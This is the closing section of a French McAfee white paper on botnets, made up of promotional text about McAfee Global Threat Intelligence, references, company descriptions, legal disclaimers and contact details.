Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère Une nouvelle arme : McAfee Global Threat Intelligence Compte tenu de la croissance exponentielle des cybermenaces et de leur sophistication accrue, les professionnels de la sécurité doivent adopter une approche différente pour détecter et contrer les attaques. Par le passé, une stratégie de défense en profondeur, à savoir une protection multiniveau, suffisait. En revanche, il est nécessaire aujourd'hui de pouvoir exploiter des informations corrélées sur les menaces recueillies aux quatre coins du globe et pour tous les vecteurs de menaces. Ces renseignements doivent être communiqués et intégrés à un large éventail de produits de sécurité pour leur permettre de mettre en œuvre des stratégies locales basées sur les menaces les plus récentes et de partager des informations. L'objectif est de disposer d'une infrastructure de gestion de la sécurité véritablement unifiée et collaborative. Avec Global Threat Intelligence, son système mondial de renseignements sur les menaces, McAfee est passé à l'étape suivante de la défense en profondeur. Ce moteur balaie Internet et collecte les données sur les menaces relatives aux différents vecteurs avant de mettre ces données en corrélation puis de créer un modèle exhaustif et d'assurer la protection des entreprises grâce à une suite complète de produits de sécurité. Nos fonctionnalités dématérialisées opèrent en étroite collaboration avec les mécanismes de mise en œuvre de stratégies et les moteurs locaux des produits McAfee afin d'offrir la protection la plus robuste et complète du marché. Nos clients ont tout avantage à installer les produits de sécurité McAfee car ceux-ci partagent non seulement les renseignements sur les menaces, mais ils les analysent et les exploitent de façon pertinente et en fonction de leur rôle et de leur emplacement sur le réseau. Références • « Progress Made, Trends Observed » (Progrès réalisés et tendances observées), Microsoft Antimalware Team. http://download.microsoft.com/download/5/6/d/56d20350-afc8-4051-a0df-677b28298912/ msrt%20-%20progress%20made%20lessons%20learned.pdf • SecureWorks. http://www.secureworks.com/ • Livres blancs techniques de McAfee Labs. http://www.mcafee.com/us/threat_center/white_paper.html A propos de McAfee Labs™ McAfee Labs est l'équipe de recherche mondiale de McAfee, Inc. Seul organisme de recherche spécialisé dans tous les vecteurs de menace (logiciels malveillants, vulnérabilités, menaces visant les environnements web, la messagerie électronique et les réseaux), McAfee Labs collecte des renseignements provenant de ses millions de sondes et de ses technologies d'évaluation de la réputation dématérialisées telles que McAfee Artemis™ et McAfee TrustedSource™. L'équipe de 350 chercheurs pluridisciplinaires de McAfee Labs, présente dans 30 pays, suit l'éventail complet des menaces en temps réel, identifiant les vulnérabilités des applications, analysant et mettant en corrélation les risques et permettant des corrections instantanées pour protéger les entreprises et les particuliers. A propos de McAfee Basé à Santa Clara en Californie, McAfee, Inc. est la plus grande entreprise au monde entièrement vouée à la sécurité informatique. McAfee consacre tous ses efforts à trouver des réponses aux plus grands défis de sécurité de notre époque. A cette fin, notre société fournit des solutions et des services proactifs réputés assurant la sécurisation des systèmes et des réseaux dans le monde entier. Les utilisateurs peuvent ainsi se connecter à Internet, surfer et faire des achats en ligne en toute sécurité. Avec le soutien d'une équipe de recherche saluée par de nombreux prix, McAfee crée des produits innovants à l'intention des particuliers, des entreprises, du secteur public et des fournisseurs de services, pour les aider à se conformer aux réglementations, à protéger leurs données, à prévenir les perturbations dans le flux des activités, à identifier les vulnérabilités ainsi qu'à surveiller et à améliorer en continu leurs défenses. www.mcafee.com/fr. Les renseignements contenus dans le présent document ne sont fournis qu'à titre informatif, au bénéfice des clients de McAfee. Les informations présentées ici peuvent faire l'objet de modifications sans préavis et sont fournies sans garantie ni représentation quant à leur exactitude ou à leur adéquation à une situation ou à des circonstances spécifiques. McAfee S.A.S. Tour Franklin, La Défense 8 McAfee et le logo McAfee sont des marques commerciales déposées ou des marques commerciales de McAfee, Inc. et/ou de ses sociétés affiliées 92042 Paris La Défense Cedex aux Etats-Unis et/ou dans d'autres pays. Les autres noms et marques peuvent être la propriété d'autres sociétés. Les plans, les spécifications et les France descriptions des produits mentionnés dans le présent document sont donnés à titre indicatif uniquement. Ils peuvent être modifiés sans préavis +33 1 47 62 56 00 (standard) et sont fournis sans aucune garantie, implicite ou explicite. www.mcafee.com/fr 10204wp_botnets_0710_ETMG
Vous pouvez aussi lire